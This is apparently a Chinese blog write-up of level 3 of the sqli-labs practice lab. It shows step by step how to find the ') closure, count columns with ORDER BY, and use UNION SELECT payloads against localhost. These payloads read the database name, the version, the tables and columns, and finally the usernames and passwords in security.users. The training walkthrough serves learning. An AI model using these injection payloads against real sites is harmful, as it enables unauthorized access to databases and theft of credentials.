首页 > 数据库 >SQL注入之sqli-labs靶场第三关

SQL注入之sqli-labs靶场第三关

时间:2024-08-11 23:27:30浏览次数:14  
标签:27 Less labs sqli SQL id localhost

标题:SQL注入之sqli-labs靶场第三关

目录:
1.寻找注入点
2.进行字段猜解
3.信息收集
4.sql注入

总结:

1.寻找注入点


在这里插入图片描述

在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=1%27)%20and%201=2--+

通过尝试发现注入点,使用双引号和)闭合,进行and 1=1 and 1=2 进行尝试

2.进行字段猜解


在这里插入图片描述
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=1%27)%20order%20by%204%20--+

使用order by 进行字段猜解,发现字段数为3

3.信息收集


使用union联合查询进行回显点查询
在这里插入图片描述
发现会显点2,3
进行信息收集:
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,database(),user()%20--+

经过查询发现数据库名:security,用户为root
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,version()%20--+

版本号为:5.7.26

4.sql注入


爆破表名
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+

爆破字段名
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

发现回显这么多字段名:Id,name,pass,flag,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password,id,username
可能是由于数据库中有同名不同库得表导致得
所以对security.users表进行查询,
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,(select%20group_concat(Id,name,pass,flag,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password,id,username)%20from%20security.users)%20%20--+

通过报错内容对字段进行排查,筛选
在这里插入图片描述

http://localhost/sqli-labs/Less-3/?id=-1%27)%20union%20select%201,2,(select%20group_concat(Id,0x3A,username,0x3A,password)%20from%20security.users)%20%20--+

最终查询出表中内容

总结


1.主要考察闭合方式 ’ 和)
2.order by 猜解字段数
3.union 联合查询
4.对MySQL数据库的information_schema库中的schemata,tables,columns,表的熟悉

标签:27,Less,labs,sqli,SQL,id,localhost
From: https://blog.csdn.net/aihua002/article/details/141113670

相关文章

  • MySQL授权用户对存储过程查询和执行权限【转】
    1、授权MySQL存储过程执行权限在项目中往往会用到存储过程来统计一些比较复杂的报表,如果数据库是mysql,则需要在执行存储过程前需要为用户添加权限,才可以,否则会提示:mysqlUserdoesnothaveaccesstometadatarequiredtodeterminestoredprocedureparametertypes错误。......
  • MySQL基础详解(3)
    文章目录索引普通索引创建索引修改表结构(添加索引)创建表的时候直接指定删除索引的语法唯一索引创建索引修改表结构创建表的时候直接指定使用ALTER命令添加和删除索引使用ALTER命令添加和删除主键显示索引信息约束非空约束:唯一约束:主键约束:外键约束:索引MySQL......
  • mysql 给了用户所有权限ALL PRIVILEGES,但是该用户没有grant权限
    在MySQL中,给用户ALLPRIVILEGES权限但没有grant权限的情况可能是因为MySQL版本的更新导致了语法的变化。在MySQL8.0及更高版本中,GRANTALLPRIVILEGES的用法已经不再支持,需要使用GRANTALLPRIVILEGESON*.*TO'username'@'host'WITHGRANTOPTION;的格式来授予用户全局权限和......
  • 【1.0版】【MYSQL安全】sql注入系列:宽字节注入
    主题sql注入系列:宽字节注入原理mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤’的时候,往往利用的思路是将‘转换为\’因此我们在此想办法将‘前面添加的\除掉,一般有......
  • 【1.0版】【MYSQL安全】SQL注入:DNSlog外带盲注回显
    主题SQL注入:DNSlog外带盲注回显利用条件DBMS中需要有可用的,能直接或间接引发DNS解析过程的子程序,即使用到UNCLinux没有UNC路径,所以当处于Linux系统时,不能使用该方式获取数据有个重要条件:load_file()函数可以使用。也就是说需要配置文件my.ini中secure_file_priv=UNCU......
  • 【1.0版】【MYSQL安全】sql注入系列:堆叠注入
    主题sql注入系列:堆叠注入原理mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行我们发现确实同时执行了,那么在实际中我们引号闭合之后也有可能可以进行堆叠注入,但是堆叠注入和开......
  • 【1.0版】【MYSQL安全】导入导出相关操作
    主题导入导出相关操作一、load_file()二、intooutfile一、load_file()load_file(file_name):读取文件并返回该文件的内容作为一个字符串使用条件:A、必须有权限读取并且文件必须完全可读and(selectcount()frommysql.user)>0#如果结果返回正常,说明具有读写......
  • mysql 相关
    1.mysql索引1.1mysql为什么使用b+树做索引mysql的索引主要有hash索引以及B+树索引对于索引,一般就是为了加快数据访问而存在的,所以索引要求的就是效率而mysql索引数据一般是存储在磁盘的,磁盘与内存的交互存在IO,而IO是硬件问题,没法解决,剩下的能解决的也就是IO次数以及......
  • 最全MySQL面试20题和答案(三)
    视图1.为什么要使用视图?什么是视图?为了提高复杂SQL语句的复用性和表操作的安全性,MySQL数据库管理系统提供了视图特性。所谓视图,本质上是一种虚拟表,在物理上是不存在的,其内容与真实的表相似,包含一系列带有名称的列和行数据。但是,视图并不在数据库中以储存的数据值形式存在。......
  • mysql数据库:DCL:管理用户,授权
    mysql数据库:DCL:管理用户,授权管理用户添加用户关闭密码复杂验证setglobalvalidate_password_policy=0;setglobalvalidate_password_length=1;语法CREATEUSER'用户名'@'主机名'IDENTIFIEDBY'密码';例子CREATEUSER'zhangsan'@'localhost&#......